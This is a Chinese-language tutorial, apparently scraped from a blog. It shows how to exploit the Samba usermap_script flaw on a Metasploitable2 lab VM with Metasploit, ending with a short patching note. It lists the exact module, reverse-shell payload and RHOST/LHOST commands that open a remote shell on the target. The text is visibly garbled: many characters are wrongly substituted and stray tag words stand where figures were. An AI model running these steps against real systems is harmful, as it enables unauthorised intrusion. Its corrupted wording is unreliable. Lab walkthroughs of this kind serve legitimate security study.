每一个操做系统都会存在各类Bug,像Windows这样有版权的操做系统,微软公司会快速地开发针对这些Bug或漏洞的补丁,并为用户提供更新。全世界有大量的漏洞研究人员会夜以继日地发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的Oday漏洞。因为这种漏洞对网络安全具备巨大威胁,所以0day漏洞也成为黑客的最爱。实际上可以掌握0day漏洞的黑客少之又少。
微软公司会针对发现的Bug按期发布补丁,可是否下载更新则取决于用户自身。安全意识薄弱的我的用户或者中小企业常会忽略这些工做,特别是在小公司中,从补丁发布到服务器打补丁须要数星期,虽然打补丁时会涉及机器的重启或死机,对公司业绩没有帮助又增长了自身的工做量,可是未打补丁或补丁过时的操做系统对黑客而言是一个快乐的"天堂"。
下面就假设目标机是Metasploitable2,对Linux机器进行渗透攻击。
Metasploitable2虚拟系统是一个特别制做的Ubuntu操做系统,主要用于安全工具测试和演示常见的漏洞攻击。该虚拟系统兼容VMware、VirtualBox和其余虚拟平台, 默认只开启一个网络适配器而且开启NAT和Host- Only。该工具能够在网站https://sourceforge.net/projects/metasploitable/files/Metasploitable2/下载。
首先对Linux目标机进行扫描,收集可用的服务信息。使用Nmap扫描并查看系统开放端口和相关的应用程序,如图所示。
安全
收集到目标机相关信息后,为其选择正确的Exploit和合适的Payload。从扫描结果中发现主机运行着Samba 3.x服务。Samba是在Linux和UNIX系统上实现SMB (Server Messages Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件和打印机的通讯协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。
输入msf> search samba
命令搜索Samba的漏洞利用模块,并选择合适的漏洞利用模块,如图所示。
服务器
而后Samba服务将返回漏洞利用模块的列表,按照各个漏洞被利用成功的相对难易度进行排序。
由于exploit/multi/samba/usermap_script被标记为"Excellent" ,即最杰出并且时间是最新的,为提升渗透成功率,这里选择此模块进行接下来的渗透。
有关漏洞的详细信息能够经过以下图所示的命令查看。
网络
输入如下命令便可使用该漏洞模块工具
use exploit/multi/samba/usermap_script
而后能够看到Metasploit命令提示符msf>会变成msf exploit(usermap_script) > 。
测试
使用以下图所示的命令便可查看该漏洞利用模块下可供选择的攻击载荷模块,由于目标是Linux机器,所以必定要选择Linux的攻击载荷。
网站
这里使用以下图所示的命令选择基础的cmd/unix/reverse反向攻击载荷模块。
操作系统
设置被攻击主机IP地址,命令以下所示。
msf exploit (usermap_script) > set RHOST 192.168.1.104
设置漏洞利用的端口号,命令以下所示。
msf exploit (usermap_script) > set RPORT 445
设置发动攻击主机IP地址,命令以下所示。
msf exploit (usermap_script) > set LHOST 192.168.1.101
设置完可使用show options
命令再次确认参数是否已设置正确。
.net
设置完全部参数变量后,输入攻击命令exploit或者run,以下所示,发动攻击。
msf exploit (usermap_ script) > exploit
MSF发动攻击成功后会获取目标主机的Shell,为了验证该Shell是目标主机的,能够查询主机名、用户名和IP地址,并与目标主机进行对比,如图所示。
unix
攻击成功后,能够看到在攻击机和目标机之间会创建一个Shell链接,渗透Windows系统的过程相似,惟一的差异是选择的漏洞利用模块和攻击载荷模块不同。建议读者多尝试各类Exploit和Payload的组合,以加深理解。
防护方法: Samba服务漏洞发生在Samba版本3.0.20 ~ 3.0.25rc3中,当使用非默认用户名映射脚本配置时,经过指定一个用户名包含Shell元字符, 攻击者能够执行任意命令。将Samba升级到最新版本便可防护本漏洞。code